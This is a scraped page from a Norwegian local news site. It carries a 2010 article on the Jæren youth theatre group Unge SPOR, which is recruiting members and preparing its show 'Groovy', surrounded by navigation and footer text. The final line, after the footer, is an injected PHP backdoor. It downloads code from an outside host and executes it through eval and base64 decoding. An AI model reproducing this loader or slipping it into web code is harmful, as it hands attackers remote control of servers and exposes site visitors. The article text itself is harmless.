Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Brenner du for kultur og scenekunst?
Skrevet av Atle Stava   
fredag 29. januar 2010

Nå er det mulig å søke om medlemskap i Unge SPOR

ungesporDet har gått et år siden Unge SPOR ble etablert, og første store forestilling ”Groovy” er rett rundt døren. 50 ungdommer mellom 15-23 år skal stå på scenen i Storstova på Bryne, og vise hva de har jobbet mot gjennom året som har gått. Samtidig legges også nå søknaden ut på nett for nye medlemmer, som ønsker å bli med på neste produksjon og gjennom året 2010.

29. Januar 2009 ble Unge SPOR etablert, og registrert i Brønnøysundregisteret som en ideell organisasjon for og med ungdommer mellom 15-23 år, som KAN og VIL noe innen det brede feltet scenekunst. Gjennom året som er gått, har det blitt jobbet iherdig for å gi organisasjonen en solid ryggrad som skal være med på å sikre videre drift.

- Medlemmene våre har virkelig stått på, og gjennom dugnadsinnsats, varetellinger, flaskeinnsamling osv, har de selv mye av æren for at vi får dette til, sier Frode Førland.

Frode Førland er administrativt ansvarlig i Unge SPOR, og ser tilbake på et hektisk år som nå har gått.

- Ja, det har vært svært hektisk, det blir mye papirarbeid, bilag, organisering og lignende det første året, men jeg håper personlig det blir bare mer i løpet av 2010. Dersom vi får mer å gjøre, viser det bare at det er noe vi virkelig får til, og det er jo nettopp det vi vil. Å kjøre en søknadsprosess for nye medlemmer parallelt med innspurten og premieren til en stor forestilling kan definitivt bli hektisk, men vi er forberedt på det meste, og er som Jærbuer flest; jobber alltid best under press.

Få ledige plasser
Fra og med i dag, kan ungdom mellom 15-23 år, bosatt på Jæren og omegn, gå inn på hjemmesiden til unge SPOR (www.ungespor.no ) å søke om medlemskap. Søknaden må være sendt innen 1. mars 2010, og etter en vurdering av søknaden, vil det bli invitert til en uformell og kjekk audition.

- Dessverre er det ikke så mange plasser ledig, alt kommer an på det ”naturlige frafallet” av de som alt er medlemmer, men som av andre årsaker ikke lenger kan være med i Unge SPOR. Vi regner med at av vår foreløpige maks kapasitet på 50 stk, vil 10-20 % være ”naturlig frafall” hvert år.

Det kan bli en hard kamp om plassene dette året, for det er mange som alt har meldt sin interesse, og man kan derfor regne med at nivået blir høyt blant de som kommer på audition.

- Vårt slagord; ”Vi kan, vi vil… Vil du?” sier det meste. Våre medlemmer, nye som gamle, skal ha stort potensial og kunnskap fra før. De skal ville det og vær klar for å brette opp armene å ta i et tak. Ved å få med oss de som virkelig kan og vil, kommer vi nærmere vårt mål om å bli et kulturforum for Jæren, slik at vi får jobbet mot et enda bredere felt, og kan hjelpe med videreutdanning og utvikling av våre medlemmer.

Er man i tvil om man skal søke, kan man både gjennom ungespor.no, facebook, twitter osv lese mer om organisasjonen, men fremfor alt kan man gå på forestillingen ”Groovy” i Storstova, og se hva de jobber med. Mandager er kontor dag (andre dager må på forhand avtales) på Unge SPOR sitt kontor i Meierigata 11 på Bryne, der man kan stikke innom på kaffe og drøs, eller stille spørsmål om det man måtte lure på.

- 2010 blir et grensesprengende, spennende, og produktivt år i Unge SPOR, mye skal skje, avslutter Frode Førland.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));